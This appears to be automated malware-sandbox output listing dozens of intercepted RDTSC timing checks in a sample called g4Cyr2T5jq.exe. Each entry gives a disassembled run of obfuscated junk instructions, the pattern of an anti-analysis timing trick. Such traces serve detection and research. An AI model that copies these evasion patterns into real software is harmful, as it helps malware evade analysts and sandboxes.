Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E600B5 second address: 4E60184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F772874F63Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 jmp 00007F772874F644h 0x00000016 pushfd 0x00000017 jmp 00007F772874F642h 0x0000001c sbb eax, 10C21958h 0x00000022 jmp 00007F772874F63Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F772874F644h 0x00000032 sbb ax, 23B8h 0x00000037 jmp 00007F772874F63Bh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F772874F648h 0x00000043 sbb ecx, 565CDE18h 0x00000049 jmp 00007F772874F63Bh 0x0000004e popfd 0x0000004f popad 0x00000050 push dword ptr [ebp+04h] 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F772874F645h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80C1E second address: 4E80C5E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F77291E5967h 0x00000008 or ax, 085Eh 0x0000000d jmp 00007F77291E5969h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 mov edx, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80C5E second address: 4E80C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F772874F63Bh 0x00000010 sub esi, 1C19626Eh 0x00000016 jmp 00007F772874F649h 0x0000001b popfd 0x0000001c mov esi, 271DD7F7h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80722 second address: 4E80726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80726 second address: 4E8072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8072C second address: 4E80745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80745 second address: 4E80749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80749 second address: 4E80765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80765 second address: 4E8076B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8076B second address: 4E8076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80618 second address: 4E8061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8061C second address: 4E80637 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5967h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80637 second address: 4E8068B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 40CAh 0x00000007 pushfd 0x00000008 jmp 00007F772874F63Bh 0x0000000d add eax, 1CE70B6Eh 0x00000013 jmp 00007F772874F649h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F772874F648h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8068B second address: 4E8068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8068F second address: 4E80695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80348 second address: 4E8034E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8034E second address: 4E803C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F772874F640h 0x00000009 sub al, 00000038h 0x0000000c jmp 00007F772874F63Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F772874F648h 0x00000018 adc ecx, 16250298h 0x0000001e jmp 00007F772874F63Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F772874F646h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F772874F63Eh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E803C7 second address: 4E803CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E803CD second address: 4E803D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E803D1 second address: 4E803E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E803E0 second address: 4E803FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F772874F649h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E803FD second address: 4E80401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80401 second address: 4E80428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F772874F63Dh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F772874F63Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80428 second address: 4E80438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E595Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E901D7 second address: 4E901EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E901EC second address: 4E901FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E595Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA04BE second address: 4EA04C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA04C2 second address: 4EA04C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA04C8 second address: 4EA051F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e jmp 00007F772874F643h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 mov di, 686Ah 0x0000001a push edi 0x0000001b jmp 00007F772874F63Eh 0x00000020 pop esi 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F772874F63Ch 0x0000002a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA051F second address: 4EA0525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0525 second address: 4EA0578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F772874F63Fh 0x00000011 xor ah, 0000001Eh 0x00000014 jmp 00007F772874F649h 0x00000019 popfd 0x0000001a mov ax, 58E7h 0x0000001e popad 0x0000001f mov eax, dword ptr [ebp+08h] 0x00000022 jmp 00007F772874F63Ah 0x00000027 and dword ptr [eax], 00000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0578 second address: 4EA057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA057C second address: 4EA0582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0582 second address: 4EA05EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 pushfd 0x00000006 jmp 00007F77291E595Eh 0x0000000b sbb ecx, 2A193778h 0x00000011 jmp 00007F77291E595Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and dword ptr [eax+04h], 00000000h 0x0000001e pushad 0x0000001f mov bx, ax 0x00000022 pushfd 0x00000023 jmp 00007F77291E5960h 0x00000028 or cx, D1D8h 0x0000002d jmp 00007F77291E595Bh 0x00000032 popfd 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F77291E5960h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA05EB second address: 4EA05EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA05EF second address: 4EA05F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8052C second address: 4E80550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80550 second address: 4E80554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80554 second address: 4E80558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E80558 second address: 4E8055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E8055E second address: 4E80572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 0673h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, si 0x00000011 mov edi, ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0007 second address: 4EA000D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA000D second address: 4EA0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0012 second address: 4EA002C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, 05h 0x0000000f movzx ecx, dx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA002C second address: 4EA008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, B7EDh 0x00000007 pushfd 0x00000008 jmp 00007F772874F63Ah 0x0000000d or si, 6B88h 0x00000012 jmp 00007F772874F63Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F772874F649h 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F772874F63Eh 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F772874F63Ah 0x00000032 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA008B second address: 4EA0091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0091 second address: 4EA00A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 38B11C63h 0x00000008 mov cx, 1BBFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA00A7 second address: 4EA00AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA00AB second address: 4EA00B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA02CC second address: 4EA0321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5965h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F77291E595Ah 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F77291E595Bh 0x00000019 or eax, 59DA332Eh 0x0000001f jmp 00007F77291E5969h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0321 second address: 4EA0386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F772874F643h 0x0000000c sbb ax, 893Eh 0x00000011 jmp 00007F772874F649h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov al, A2h 0x0000001e push edx 0x0000001f mov bx, ax 0x00000022 pop esi 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F772874F649h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EA0386 second address: 4EA038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC064F second address: 4EC0655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0655 second address: 4EC0693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5968h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F77291E5960h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 popad 0x00000017 xchg eax, ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov ecx, 02A3E201h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0693 second address: 4EC06FB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F772874F63Eh 0x00000008 and cx, EF18h 0x0000000d jmp 00007F772874F63Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ch, 66h 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F772874F647h 0x00000022 sbb ecx, 3936E88Eh 0x00000028 jmp 00007F772874F649h 0x0000002d popfd 0x0000002e mov ax, AF97h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC06FB second address: 4EC0701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0701 second address: 4EC0705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0705 second address: 4EC0777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F77291E595Bh 0x0000000e mov eax, dword ptr [76FA65FCh] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F77291E5964h 0x0000001a or ch, 00000068h 0x0000001d jmp 00007F77291E595Bh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F77291E5968h 0x00000029 adc eax, 79FC77C8h 0x0000002f jmp 00007F77291E595Bh 0x00000034 popfd 0x00000035 popad 0x00000036 test eax, eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0777 second address: 4EC077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC077B second address: 4EC077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC077F second address: 4EC0785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0785 second address: 4EC0832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F779B248B29h 0x0000000f jmp 00007F77291E5960h 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 jmp 00007F77291E595Eh 0x0000001c pushfd 0x0000001d jmp 00007F77291E5962h 0x00000022 adc ch, FFFFFFB8h 0x00000025 jmp 00007F77291E595Bh 0x0000002a popfd 0x0000002b popad 0x0000002c xor eax, dword ptr [ebp+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F77291E5960h 0x00000038 adc eax, 3AA88218h 0x0000003e jmp 00007F77291E595Bh 0x00000043 popfd 0x00000044 pushfd 0x00000045 jmp 00007F77291E5968h 0x0000004a and esi, 058EEC78h 0x00000050 jmp 00007F77291E595Bh 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0832 second address: 4EC0882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007F772874F63Bh 0x0000000c adc ax, 7C3Eh 0x00000011 jmp 00007F772874F649h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and ecx, 1Fh 0x0000001d jmp 00007F772874F63Eh 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push edi 0x00000028 pop eax 0x00000029 mov si, dx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0882 second address: 4EC0897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77291E5961h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0897 second address: 4EC0930 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c pushfd 0x0000000d jmp 00007F772874F63Fh 0x00000012 jmp 00007F772874F643h 0x00000017 popfd 0x00000018 popad 0x00000019 retn 0004h 0x0000001c nop 0x0000001d mov esi, eax 0x0000001f lea eax, dword ptr [ebp-08h] 0x00000022 xor esi, dword ptr [00542014h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push eax 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e push eax 0x0000002f call 00007F772D10FE41h 0x00000034 push FFFFFFFEh 0x00000036 jmp 00007F772874F646h 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F772874F63Dh 0x00000045 and si, 3546h 0x0000004a jmp 00007F772874F641h 0x0000004f popfd 0x00000050 pushfd 0x00000051 jmp 00007F772874F640h 0x00000056 or esi, 3BDB61E8h 0x0000005c jmp 00007F772874F63Bh 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4EC0930 second address: 4EC0976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F772DBA61DDh 0x00000011 mov edi, edi 0x00000013 jmp 00007F77291E595Eh 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F77291E5960h 0x0000001e push eax 0x0000001f pushad 0x00000020 mov cl, dh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E7007D second address: 4E700A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E700A0 second address: 4E700A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E700A4 second address: 4E700F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushfd 0x00000008 jmp 00007F772874F63Bh 0x0000000d add si, E84Eh 0x00000012 jmp 00007F772874F649h 0x00000017 popfd 0x00000018 pop eax 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F772874F648h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E700F5 second address: 4E70104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70104 second address: 4E70127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70127 second address: 4E70130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 9F9Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 4E70130 second address: 4E70136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
